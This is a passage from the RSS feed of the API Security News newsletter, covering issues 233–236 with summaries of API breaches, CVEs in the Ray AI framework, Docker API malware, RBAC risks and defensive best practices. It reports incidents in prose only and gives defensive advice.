<li style="font-weight: 400;" aria-level="1"><b>Support:</b><span style="font-weight: 400;"> the catalog can be useful to support teams in identifying APIs and their respective owners, which is important when allocating support teams to support an incident.</span></li>
<li style="font-weight: 400;" aria-level="1"><b>Onboarding and training:</b><span style="font-weight: 400;"> help onboarding new team members understand the overall API topology during their onboarding and induction.</span></li>
<li style="font-weight: 400;" aria-level="1"><b>Ongoing development:</b><span style="font-weight: 400;"> provides information to developers about the existence of APIs already available in their organization.</span></li>
<li style="font-weight: 400;" aria-level="1"><b>Strategic planning:</b><span style="font-weight: 400;"> allows the leadership teams to consolidate their inventory and plan their strategy going forward regarding new APIs and deprecation of obsolete APIs.</span></li>
</ul>
<p><span style="font-weight: 400;">This article features an in-depth look at the </span><i><span style="font-weight: 400;">Port</span></i><span style="font-weight: 400;"> developer portal platform, which looks very comprehensive and offers a totally free tier.</span></p>
<h2><span style="font-weight: 400;">Guide: Finding “dark data” in an API </span></h2>
<p><span style="font-weight: 400;">Our top contributor in 2023 is undoubtedly Dana Epp, and it’s appropriate that </span><a href="https://danaepp.com/finding-dark-data" target="_blank" rel="noopener"><span style="font-weight: 400;">we feature him in our Christmas issue</span></a><span style="font-weight: 400;">. This time, he’s discussing the critical topic of “dark data” within APIs. </span></p>
<p><span style="font-weight: 400;">Dana’s working definition of “dark data” is “as any data collected and stored by an organization but not generally used for any practical purpose.” This data can be any from internal storage systems such as databases or various analytics and business intelligence tools. Think of it as metadata that may leak confidential information about your primary data assets, allowing an attacker to infer various useful insights.</span></p>
<p><span style="font-weight: 400;">Dana calls out the significant concerns around the leakage of such dark data, namely:</span></p>
<ul>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Security risks: data may include sensitive information such as usernames or other PII. </span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Compliance issues: many industries have very strict data protection and privacy requirements, and even such seemingly innocuous data may constitute a violation.</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Insights and opportunities: dark data can provide an attacker with insights into how to attack your organization via its business logic or application flows. </span></li>
</ul>
<p><span style="font-weight: 400;">The impacts of dark data leakage (and, more generally, excessive information exposure) are captured in the OWASP API Security Top 10 as the third most significant concern affecting APIs in the category </span><a href="https://owasp.org/API-Security/editions/2023/en/0xa3-broken-object-property-level-authorization/" target="_blank" rel="noopener"><span style="font-weight: 400;">API3:2023 Broken Object Property Level Authorization</span></a><span style="font-weight: 400;">. </span></p>
<p><span style="font-weight: 400;">The recommendation for an API builder or defender is to use a tightly constrained OpenAPI definition that specifies the minimum data to satisfy the API’s functionality. Use continuous testing to ensure that your APIs meet this contract, and use runtime protection to ensure APIs do not leak additional data in production.</span></p>
<h2><span style="font-weight: 400;">Tools: Web Security Academy resources for API security</span></h2>
<p><span style="font-weight: 400;">PortSwigger’s </span><i><span style="font-weight: 400;">Web Security Academy</span></i><span style="font-weight: 400;"> is an evergreen resource for learning about web application security and API security. The academy provides excellent guided lessons and hands-on laboratories to allow users to explore topics of interest. In my opinion, their academy is one of the best learning resources for security topics.</span></p>
<p><span style="font-weight: 400;">Recently, </span><a href="https://portswigger.net/web-security/api-testing/top-10-api-vulnerabilities" target="_blank" rel="noopener"><span style="font-weight: 400;">they have published guidance</span></a><span style="font-weight: 400;"> on learning resources specific to the OWASP API Security Top 10. This resource is great for anyone (attacker or defender) wanting to learn more about API security.</span></p>
<h2><span style="font-weight: 400;">Vulnerability: API vulnerability found in Ray AI framework</span></h2>
<p><span style="font-weight: 400;">Last week, </span><a href="https://apisecurity.io/issues-235-25m-loss-at-kronos-due-to-api-key-loss-and-three-other-api-vulnerabilities/" target="_blank" rel="noopener"><span style="font-weight: 400;">we covered several vulnerabilities</span></a><span style="font-weight: 400;"> discovered in the Ray AI framework. We failed to provide the</span><a href="https://www.anyscale.com/blog/update-on-ray-cves-cve-2023-6019-cve-2023-6020-cve-2023-6021-cve-2023-48022-cve-2023-48023" target="_blank" rel="noopener"><span style="font-weight: 400;"> official response from Anyscale</span></a><span style="font-weight: 400;"> concerning the disclosure. </span></p>
<p><span style="font-weight: 400;">In summary, the status is as follows:</span></p>
<ul>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">4 of the 5 reported CVEs (CVE-2023-6019, CVE-2023-6020, CVE-2023-6021, CVE-2023-48023) are fixed in the master and will be released as part of Ray 2.8.1.</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">The remaining CVE (CVE-2023-48022) &#8211; that Ray does not have authentication built-in &#8211; is a long-standing design decision based on how Ray’s security boundaries are drawn.</span></li>
</ul>
<p><span style="font-weight: 400;">According to their post, the 5th CVE (the lack of authentication built into Ray) has not been addressed, and that is why it is not, in their opinion, a vulnerability or a bug.</span></p>
<h2><span style="font-weight: 400;">Webinar: Top Things You Need to Know About API Security</span></h2>
<p><span style="font-weight: 400;">The flipside of the exponential adoption of APIs over the past decade has been the upsurge in the sheer volume of API attacks. Stories of API security breaches are everywhere which shines a harsh spotlight on the ease of API abuse and the complexities of robust API security. </span><a href="https://42crunch.com/webinar-top-things-you-need-to-know-about-api-security/" target="_blank" rel="noopener"><span style="font-weight: 400;">Join this webinar</span></a><span style="font-weight: 400;"> as two of the industry’s leading experts guide you through some real-world cases of API security attacks and also share some best practices for securing your APIs. </span><a href="https://itwire.com/guest-articles/guest-opinion/why-apis-are-proving-fertile-ground-for-cyber-attackers.html" target="_blank" rel="noopener"><span style="font-weight: 400;"><br />
</span></a></p>
<p><span style="font-weight: 400;">They dive into crucial vulnerabilities highlighted in the OWASP API Security Top 10, such as enforcing authorization, protecting authentication endpoints and preventing SSRF, a new entry in the 2023 version of the OWASP Top10 for APIs. They also bring the threats to life with several demos, providing a practical look at how these vulnerabilities can be exploited, but also how they can be prevented through a combination of design-time and run-time protection. </span><a href="https://itwire.com/guest-articles/guest-opinion/why-apis-are-proving-fertile-ground-for-cyber-attackers.html" target="_blank" rel="noopener"><span style="font-weight: 400;"><br />
</span></a></p>
<p><span style="font-weight: 400;">At the end of this session, you will have an actionable set of guidelines to assess and improve the security of your own APIs in the face of a number of identified threats.</span></p>
<p><a href="https://42crunch.com/webinar-top-things-you-need-to-know-about-api-security/" target="_blank" rel="noopener"><img loading="lazy" decoding="async" class="alignnone wp-image-11020" src="https://apisecurity.io/wp-content/uploads/2023/12/Top-things-you-need-to-know-about-API-Security-Webinar-2024-300x172.png" alt="" width="446" height="254" srcset="https://apisecurity.io/wp-content/uploads/2023/12/Top-things-you-need-to-know-about-API-Security-Webinar-2024-300x172.png 300w, https://apisecurity.io/wp-content/uploads/2023/12/Top-things-you-need-to-know-about-API-Security-Webinar-2024-1024x585.png 1024w, https://apisecurity.io/wp-content/uploads/2023/12/Top-things-you-need-to-know-about-API-Security-Webinar-2024-768x439.png 768w, https://apisecurity.io/wp-content/uploads/2023/12/Top-things-you-need-to-know-about-API-Security-Webinar-2024-1536x878.png 1536w, https://apisecurity.io/wp-content/uploads/2023/12/Top-things-you-need-to-know-about-API-Security-Webinar-2024.png 1784w" sizes="auto, (max-width: 446px) 100vw, 446px" /></a></p>
<h2><span style="font-weight: 400;">Predictions for API security in 2024</span></h2>
<p><span style="font-weight: 400;">Finally, I am compelled to make some predictions of my own for API security in 2024. I think API security will remain an important topic in 2024 and continue to receive significant attention at various levels. Based on what I have seen recently in the newsletter, I predict:</span></p>
<ul>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">We will see more so-called mega-breaches where organizations lose all of their customer or private data to API breaches or exploits (see examples </span><a href="https://apisecurity.io/issue-203-optus-data-breach-api-security-guide-authn-authz-vulnerabilities/"><span style="font-weight: 400;">here</span></a><span style="font-weight: 400;"> and </span><a href="https://apisecurity.io/issue-224-api-security-is-critical-in-2023-api-contract-testing-and-fencer-security-testing-tool/"><span style="font-weight: 400;">here</span></a><span style="font-weight: 400;">)</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Vendors (seemingly most often cryptocurrency portals) will continue to experience key leakage or loss (see </span><a href="https://apisecurity.io/issues-235-25m-loss-at-kronos-due-to-api-key-loss-and-three-other-api-vulnerabilities/"><span style="font-weight: 400;">here</span></a><span style="font-weight: 400;">, </span><a href="https://apisecurity.io/issue-234-sumo-logic-breach-risk-of-rbac-vulnerabilities-automated-api-contracts/"><span style="font-weight: 400;">here</span></a><span style="font-weight: 400;">, and </span><a href="https://apisecurity.io/232-api-attacks-surge-the-silent-threat-of-apis-jumpcloud-incident-review/"><span style="font-weight: 400;">here</span></a><span style="font-weight: 400;"> for examples) </span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Attackers will continue to shift their attacks toward more subtle vectors that exploit the business logic of the API rather than specific implementation flaws. A good example is </span><a href="https://apisecurity.io/issue-217-wordle-api-exposes-answers-twitter-api-breach-updates-aws-exposed-dangerous-api/" target="_blank" rel="noopener"><span style="font-weight: 400;">the recent Twitter mass account information leakage incident</span></a><span style="font-weight: 400;">, which occurred without detection over 18 months.</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">I think we will see the occurrence of the first batch of API supply chain vulnerabilities where an upstream API flaw is instrumental in a breach in a downstream API, as predicted by OWASP with the new </span><a href="https://owasp.org/API-Security/editions/2023/en/0xaa-unsafe-consumption-of-apis/" target="_blank" rel="noopener"><span style="font-weight: 400;">API10:2023 Unsafe Consumption of APIs</span></a><span style="font-weight: 400;">.</span></li>
<li>And finally, the role of the developer in implementing API security at design time will only continue to rise. As I alluded to over a year ago, <a href="https://devops.com/empathy-for-the-api-developer/" target="_blank" rel="noopener">empathy for the API developer</a> with tools designed to secure code at design time can only help improve API security in general.</li>
</ul>
<p>The post <a href="https://apisecurity.io/issues-236-using-a-developer-portal-dark-data-in-apis-update-ray-ai-framework-predictions-for-2024/">Issue 236: Using a developer portal, dark data in APIs, an update on Ray AI framework, predictions for 2024</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 235: 25m loss at Kronos due to API key loss and three other API vulnerabilities</title>
		<link>https://apisecurity.io/issues-235-25m-loss-at-kronos-due-to-api-key-loss-and-three-other-api-vulnerabilities/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Thu, 14 Dec 2023 18:06:23 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=11013</guid>

					<description><![CDATA[<p>This week, we have news of four API-related security vulnerabilities, including Kronos&#8217;s $25m loss. Other vulnerabilities include a malware threat of DDoS on Docker APIs, a report on vulnerabilities on WordPress and Netflix, and an API vulnerability found in the Ray AI framework. We also have an article on why APIs are fertile ground for [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issues-235-25m-loss-at-kronos-due-to-api-key-loss-and-three-other-api-vulnerabilities/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issues-235-25m-loss-at-kronos-due-to-api-key-loss-and-three-other-api-vulnerabilities/">Issue 235: 25m loss at Kronos due to API key loss and three other API vulnerabilities</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p><span style="font-weight: 400;">This week, </span><span style="font-weight: 400;">we have news of four API-related security vulnerabilities, including Kronos&#8217;s $25m loss. Other vulnerabilities include a malware threat of DDoS on Docker APIs, a report on vulnerabilities on WordPress and Netflix, and an API vulnerability found in the Ray AI framework. We also have an article on why APIs are fertile ground for attackers and on protecting APIs for online retail.</span></p>
<h2><span style="font-weight: 400;">Breach: Kronos suffers $25m loss involving API key loss</span></h2>
<p><span style="font-weight: 400;">The </span><a href="https://crypto.news/kronos-trading-firm-suffers-security-breach-losses-25m/" target="_blank" rel="noopener"><span style="font-weight: 400;">most important news this week</span></a><span style="font-weight: 400;"> is the breach at the cryptocurrency fintech firm Kronos Research, who revealed in</span><a href="https://twitter.com/ResearchKronos/status/1726203102842466650" target="_blank" rel="noopener"><span style="font-weight: 400;"> a post on X</span></a><span style="font-weight: 400;"> that they had suffered a loss estimated at $25 million. The company admitted that the breach originated with “unauthorized access to some of their API keys.” although it did not provide any further detail. Independent observers commented that they had seen Ethereum outflows from a wallet to a value of approximately $25m, which seems to correlate with the disclosure. </span></p>
<p><span style="font-weight: 400;">This is yet another in a steady sequence of breaches involving the loss or leakage of API keys, particularly on cryptocurrency platforms. As ever, the advice is to protect the keys using vault or secure storage mechanisms and ensure they are invalidated in the event of loss or theft.</span></p>
<h2><span style="font-weight: 400;">Vulnerability: Malware poses a DDoS threat to Docker API</span></h2>
<p><span style="font-weight: 400;">The next vulnerability is </span><a href="https://www.infosecurity-magazine.com/news/python-malware-ddos-threat-docker/" target="_blank" rel="noopener"><span style="font-weight: 400;">the discovery of Python malware</span></a><span style="font-weight: 400;"> affecting exposed Docker engine API endpoints. Researchers discovered that a malicious container image (disguised as a benign MySQL image) contained Python malware compiled as an ELF executable. </span></p>
<p><span style="font-weight: 400;">The attack was initiated by issuing an API request to the exposed Docker API to begin the download of the malicious image. Upon execution of the image, the malware connected to a command-and-control center and then undertook various DDoS using UDP and SSL-based flooding attacks. The command-and-control interface was found to control the target IP addresses and domains, including the duration, rate, and port.</span></p>
<p><span style="font-weight: 400;">We frequently cover issues with exposed Docker or Kubernetes API management interfaces being abused by attackers. Ensure these endpoints are either isolated from public networks or protected with strong authentication.</span></p>
<h2><span style="font-weight: 400;">Vulnerability: Report exposes WordPress and Netflix API flaws</span></h2>
<p><span style="font-weight: 400;">The next article covers the </span><a href="https://appdevelopermagazine.com/api-security-risks-report-exposes-netflix-and-wordpress/" target="_blank" rel="noopener"><span style="font-weight: 400;">latest research into API threats and vulnerabilities</span></a><span style="font-weight: 400;"> from Wallarm in their ThreatStats report. The report aggregates findings from 239 API vulnerabilities, with the most significant finding being that nearly a third featured broken authentication, authorization, or access control. The report highlights cases of incorrect credential validation on OAuth tokens, allowing possible unauthorized access, and WordPress encountered issues with broken plugin authentication.</span></p>
<p><span style="font-weight: 400;">The rise in API adoption has resulted in increasing incidences of data leakage and ranked fourth in the report’s ranking for severity. The report cites findings from Netflix, VMware, and SAP, which recently exposed sensitive information over their APIs. The report also highlights the rise in leaked or stolen API keys incidents.</span></p>
<h2><span style="font-weight: 400;">Vulnerability: API vulnerability found in Ray AI framework</span></h2>
<p><span style="font-weight: 400;">The final of our vulnerabilities in this issue comes </span><a href="https://www.securityweek.com/critical-vulnerability-found-in-ray-ai-framework/" target="_blank" rel="noopener"><span style="font-weight: 400;">courtesy of a report in Security Week</span></a><span style="font-weight: 400;">, which provides a review of a vulnerability (tracked as </span><a href="https://nvd.nist.gov/vuln/detail/CVE-2023-48023" target="_blank" rel="noopener"><span style="font-weight: 400;">CVE-2023-48023</span></a><span style="font-weight: 400;">) in the Ray AI framework. The root cause of the vulnerability is broken authentication on two of its components, the dashboard and the client. An attacker could use the vulnerability to submit or delete jobs to the engine or, even more seriously, retrieve sensitive information or execute arbitrary code.</span></p>
<p><span style="font-weight: 400;">Most surprising is that the framework does not provide any form of authentication at all, with the only reference being some support for mutual TLS, which is a significant oversight in the design since any user with dashboard access effectively had control of the platform. </span></p>
<p><span style="font-weight: 400;">At the time of writing, the issues had yet to be addressed, either since the vendor did not recognize them as security issues or was unwilling to manage them.</span></p>
<h2><span style="font-weight: 400;">Article: APIs are proving fertile ground for cyber attackers</span></h2>
<p><a href="https://itwire.com/guest-articles/guest-opinion/why-apis-are-proving-fertile-ground-for-cyber-attackers.html" target="_blank" rel="noopener"><span style="font-weight: 400;">The next article features the views</span></a><span style="font-weight: 400;"> of Matias Madou (CTO of Secure Code Warrior) on how API security creates an opportunity for cyber attackers who see APIs as an easy target. Madou highlights that many APIs suffer from poor access control, citing recent high-profile examples such as T-Mobile and LinkedIn. This is hardly surprising because access control flaws comprise the top half of the OWASP API Security Top 10. </span></p>
<p><span style="font-weight: 400;">Madou suggests these findings result from poor awareness of security best practices by API developers. In particular, developers need help with the core topics of authentication and authorization. He recommends that organizations commit to continually upskilling their developers through training and allocating sufficient time to allow them to absorb learning and explore best practices. </span></p>
<p><span style="font-weight: 400;">Madou also highlights some industry concerns about how API security is managed. Current reports suggest that 40% of organizations need a dedicated owner of API security; instead, the responsibility is shared between the CISO or the DevSecOps teams. Somewhat concerningly, 24% of respondents said no one in particular owns API security in their organization. If ownership is unclear, then it is likely that the responsibility for API security will fall between the cracks — ensure this critical topic has a dedicated owner.</span></p>
<p><span style="font-weight: 400;">Thanks to Matias for another great contribution to the importance of developer training.</span></p>
<h2><span style="font-weight: 400;">Article: Protecting APIs for online retail</span></h2>
<p><span style="font-weight: 400;">Finally, this week, </span><a href="https://www.darkreading.com/vulnerabilities-threats/keep-your-organizations-apis-protected-this-holiday-season" target="_blank" rel="noopener"><span style="font-weight: 400;">we have a seasonal article </span></a><span style="font-weight: 400;">on how to protect APIs for online retail over the festive season. The article highlights the scale of online fraud, citing the astonishing statistic that in the first six months of 2022, Americans lost a record figure of $3.56 billion to online fraud. During the peak holiday season (starting from 1 November, going to the year end), commerce sites will see a massive uptick in bot attacks ranging from a fivefold increase to a whopping thirtyfold increase. Attackers have readily discovered that APIs often lack the necessary sophisticated protections to defend against bot attacks and will often launch automated attacks on retail endpoints using stolen credit card numbers to identify retailers with insufficient fraud protection. </span></p>
<p><span style="font-weight: 400;">The author recommends the use of a robust bot protection solution and the following API best practices:</span></p>
<ul>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Strong authentication mechanisms such as multifactor authentication.</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Data encryption and secure transmission to protect data in transit.</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Monitoring and anomaly detection to identify changing threats.</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Fraud detection and prevention to verify payment information.</span></li>
</ul>
<p><span style="font-weight: 400;">This is a timely reminder to all our readers to be extra vigilant to online fraud over this festive season.</span></p>
<p>The post <a href="https://apisecurity.io/issues-235-25m-loss-at-kronos-due-to-api-key-loss-and-three-other-api-vulnerabilities/">Issue 235: 25m loss at Kronos due to API key loss and three other API vulnerabilities</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 234: Sumo Logic breach leads to key reset, risk of RBAC vulnerabilities, automated API contracts</title>
		<link>https://apisecurity.io/issue-234-sumo-logic-breach-risk-of-rbac-vulnerabilities-automated-api-contracts/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Tue, 05 Dec 2023 11:20:57 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=11004</guid>

					<description><![CDATA[<p>This week, we have news of another API key leak, this time affecting users of Sumo Logic, who have been advised to rotate their keys out of caution. We also have articles on the risk of RBAC vulnerabilities for APIs and why CFOs should prioritize API security as a cost-saver and business enabler. We also [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-234-sumo-logic-breach-risk-of-rbac-vulnerabilities-automated-api-contracts/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-234-sumo-logic-breach-risk-of-rbac-vulnerabilities-automated-api-contracts/">Issue 234: Sumo Logic breach leads to key reset, risk of RBAC vulnerabilities, automated API contracts</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p><span style="font-weight: 400;">This week, we have news of another API key leak, this time affecting users of Sumo Logic, who have been advised to rotate their keys out of caution. We also have articles on the risk of RBAC vulnerabilities for APIs and why CFOs should prioritize API security as a cost-saver and business enabler. We also have a book review, a report on the size of the API market, and, finally, news of a new tool from 42Crunch.</span></p>
<h2><span style="font-weight: 400;">Breach: Sumo Logic advises customers to reset API keys</span></h2>
<p>Sumo Logic confirmed it had <a href="https://techcrunch.com/2023/11/08/sumo-logic-urges-customers-to-reset-api-keys-following-security-breach/" target="_blank" rel="noopener">discovered evidence of a potential security incident</a> on the 3rd of November. It has since locked down the exposed infrastructure and rotated every potentially exposed credential “out of an abundance of caution.”</p>
<p>Although Sumo Logic insisted there was no indication of a compromise or a breach of customer data, they advised customers to rotate both keys used to access Sumo Logic or that were provided to Sumo Logic for accessing other systems. The attack was believed to have involved third-party access to a Sumo Logic AWS account.</p>
<p>Although Sumo Logic declined to comment further on the details of the incident, it assured customers that they were committed to “a safe and secure digital experience,”</p>
<p>This is another in a recent spate of API key leakage incidents coming on the back of the OpenSea and JumpCloud incidents reported in this newsletter.</p>
<h2><span style="font-weight: 400;">Article: The risk of RBAC vulnerabilities</span></h2>
<p><span style="font-weight: 400;">The</span><a href="https://gbhackers.com/risk-of-rbac-vulnerabilities/" target="_blank" rel="noopener"><span style="font-weight: 400;"> first article this week</span></a><span style="font-weight: 400;"> is from GBHackers and discusses the risk of role-based access control (RBAC) vulnerabilities in systems built-up APIs. Most people, I am sure, are familiar with the principle of RBAC — a user is assigned rights on a system based on their role, and when they no longer hold that role, those rights fall away. This paradigm is a popular choice for API authorization too, where frameworks such as Casbin and Oso HQ provide good implementations of RBAC engines.</span></p>
<p><span style="font-weight: 400;">The article describes typical usage of RBAC in certain industries such as healthcare, financial services, eCommerce, and government. It then goes on to describe some common RBAC vulnerabilities encountered in the real world:</span></p>
<ul>
<li style="font-weight: 400;" aria-level="1"><b>Excessive Permissions:</b><span style="font-weight: 400;"> This is the most obvious vulnerability and simply occurs when a role is given excessive permissions to accomplish the given tasks. The principle of least privilege should be employed to ensure only the necessary permissions are assigned.</span></li>
<li style="font-weight: 400;" aria-level="1"><b>Stale Roles:</b><span style="font-weight: 400;"> Often a user will be assigned a role that they no longer need after some time. This results in maintaining access, which is no longer necessary.</span></li>
<li style="font-weight: 400;" aria-level="1"><b>Permission Creep:</b><span style="font-weight: 400;"> Similar to stale roles, this is when a user changes roles frequently and accumulates more roles than they need.</span></li>
<li style="font-weight: 400;" aria-level="1"><b>Inadequate Auditing:</b><span style="font-weight: 400;"> The previous two vulnerabilities can be identified by regular audits; failing to perform these regularly is another common failure pattern.</span></li>
<li style="font-weight: 400;" aria-level="1"><b>Insecure APIs:</b><span style="font-weight: 400;"> These can be an entry point for attackers to manipulate permissions or gain unauthorized access to sensitive data.</span></li>
</ul>
<p><span style="font-weight: 400;">The guide ends with some rather generic but useful advice on how to prevent RBAC vulnerabilities, namely:</span></p>
<ul>
<li style="font-weight: 400;" aria-level="1"><b>Least Privilege Principle: </b><span style="font-weight: 400;">This is the obvious solution for many RBAC issues and relies on only assigning the absolute minimum set of permissions to complete a role. The challenge comes in identifying those permissions in the first instance.</span></li>
<li style="font-weight: 400;" aria-level="1"><b>Time-Based Roles: </b><span style="font-weight: 400;">This is a failsafe method to prevent permission creep and that is to periodically revalidate the role access, or to forcibly remove the role entirely.</span></li>
<li style="font-weight: 400;" aria-level="1"><b>Multi-Factor Authentication (MFA):</b><span style="font-weight: 400;"> Sensitive roles (such as admin roles) should employ MFA to prevent unauthorized access.</span></li>
</ul>
<p><span style="font-weight: 400;">This is a quick, easy read for anyone implementing RBAC in their systems.</span></p>
<h2><span style="font-weight: 400;">Article: Why CFOs should prioritize API security</span></h2>
<p><span style="font-weight: 400;">The </span><a href="https://securityboulevard.com/2023/10/safeguarding-financial-health-why-cfos-should-prioritize-api-security/" target="_blank" rel="noopener"><span style="font-weight: 400;">next article from Security Boulevard</span></a> <span style="font-weight: 400;">provides a really interesting perspective on the need to prioritize API security looking at it from the view of the Chief Financial Officer (CFO). Frequently in this newsletter, we consider API security from a technical or security viewpoint, so it&#8217;s interesting to understand the financial motivators behind producing secure APIs. </span></p>
<p><span style="font-weight: 400;">The first obvious benefit is simply avoiding the cost of breaches in the first instance. Breaches can lead to fines due to failings in regulatory, GDPR, CCPA, or HIPAA compliance. In many cases, these fines can be crippling, being a significant portion of revenue. Large-scale breaches also undoubtedly lead to brand damage and a tarnished reputation, leading to a loss in consumer confidence, particularly if those consumers are entrusting you with their data. </span></p>
<p><span style="font-weight: 400;">Consumers are becoming more security savvy and are paying attention to news of large-scale breaches. Once a reputation is tarnished the brand may never recover from the damage inflicted. For a CFO, this has to be a strong and compelling driver.</span></p>
<p><span style="font-weight: 400;">As security practitioners among our readers will know only too well, a breach can be extremely costly in terms of operation cost in recovering from the breach and the loss of revenue resulting from the downtime incurred. Obviously, handling the breach will distract security teams from addressing other security activities, such as proactively improving API security, in the first instance.</span></p>
<p><span style="font-weight: 400;">Another obvious financial benefit to a robust API security regimen is the likely reduction in cybersecurity insurance. By being proactive about security, in particular about API security, and being able to demonstrate proactivity can allow a savvy CFO to negotiate better rates and terms with insurance providers.</span></p>
<p><span style="font-weight: 400;">APIs are a vital part of the modern supply chain and by ensuring the APIs you consume and provide are secure, you can minimize the risk of inheriting risk from your providers or passing risk on to your consumers. </span></p>
<p><span style="font-weight: 400;">Finally, if your teams are not reactive and dealing with ongoing API security breaches and incidents, they can be freed up to drive innovation by building new products and integrations or by ensuring even greater security. </span></p>
<p><span style="font-weight: 400;">This is a useful guide for those wishing to justify upcoming budgets for API security projects.</span></p>
<h2><span style="font-weight: 400;">Book: Automating API delivery</span></h2>
<p><span style="font-weight: 400;">A friend of the newsletter Ikenna Nwaiwu, has </span><a href="https://www.manning.com/books/automating-api-delivery?ar=true&amp;lpse=A&amp;ar=false&amp;lpse=B" target="_blank" rel="noopener"><span style="font-weight: 400;">recently published his book with Manning</span></a><span style="font-weight: 400;"> on the topic of “</span><i><span style="font-weight: 400;">Automating API delivery”</span></i><span style="font-weight: 400;">. The book focuses on how to use DevOps approaches in your API design and delivery phase and covers the following topics:</span></p>
<ul>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Enforce API design standards with linting</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Automate breaking-change checks to control design creep</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Ensure the accuracy of API reference documents</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Centralize API definition consistency checks</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Automate API configuration deployment</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Conduct effective API design reviews</span></li>
</ul>
<p><span style="font-weight: 400;">I particularly enjoyed the sections on automating API linting, using GitHub Actions and the section on OpenAPI Generator, which shows great promise. The book is in early access from Manning and has only three more chapters to go. Good luck to Ikenna getting this over the line, and with the upcoming launch and promotion.</span></p>
<h2><span style="font-weight: 400;">Report: API market set to continue to grow</span></h2>
<p><span style="font-weight: 400;">If anyone doubted the size of the API market, then the</span><a href="https://www.digit.fyi/api-market-set-to-grow-more-than-entire-uk-economy/" target="_blank" rel="noopener"><span style="font-weight: 400;"> latest research from Kong</span></a><span style="font-weight: 400;"> should prove to be a real eye-opener. The headline figure is quite startling, with the global economic impact expected to rise from approximately £7.17 trillion in 2023 to about £9.33 trillion over the next four years. Unsurprisingly, much of this growth will come from the artificial intelligence market estimated at around £4.41 trillion in 2027, indicating a substantial 76% increase from 2023 estimates.</span></p>
<p><span style="font-weight: 400;">The report does make the obvious and crucial point that security risks arising from such exponential growth should not be underestimated. </span></p>
<h2><span style="font-weight: 400;">Tools: Automated API contract generation</span></h2>
<p><span style="font-weight: 400;">Recently, 42Crunch </span><a href="https://42crunch.com/42crunch-launches-automated-api-contract-generation-to-improve-governance-speed-development/" target="_blank" rel="noopener"><span style="font-weight: 400;">released their new automatic API contract generation tool</span></a> <i><span style="font-weight: 400;">API Capture,</span></i><span style="font-weight: 400;"> which will enable organizations to automate the generation of OpenAPI contracts (aka. Swagger files), which can be used to facilitate security auditing and testing. The tool analyzes network traffic and also imports Postman collections to auto-generate the API contract definitions. ​​</span><span style="font-weight: 400;"> This innovative approach expedites testing timelines, minimizes manual effort, and ensures highly secure and scalable APIs. </span><span style="font-weight: 400;"> </span></p>
<p><span style="font-weight: 400;">Further information is available on the </span><a href="https://42crunch.com/api-capture/" target="_blank" rel="noopener"><span style="font-weight: 400;">42Crunch website </span></a></p>
<p>The post <a href="https://apisecurity.io/issue-234-sumo-logic-breach-risk-of-rbac-vulnerabilities-automated-api-contracts/">Issue 234: Sumo Logic breach leads to key reset, risk of RBAC vulnerabilities, automated API contracts</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 233: Flaws in OAuth social sign-in, securing API gateways, scalable SaaS security</title>
		<link>https://apisecurity.io/issue-223-flaws-in-oauth-securing-api-gateways-scalable-saas-security/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Thu, 16 Nov 2023 21:12:34 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=10992</guid>

					<description><![CDATA[<p>This week, we have important news of a vulnerability in the OAuth social sign-in feature of many popular platforms, potentially impacting billions of users. We have two articles from The NewStack, the first a guide on securing your API gateway and the second how to design scalable SaaS API security. We also have news of [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-223-flaws-in-oauth-securing-api-gateways-scalable-saas-security/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-223-flaws-in-oauth-securing-api-gateways-scalable-saas-security/">Issue 233: Flaws in OAuth social sign-in, securing API gateways, scalable SaaS security</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
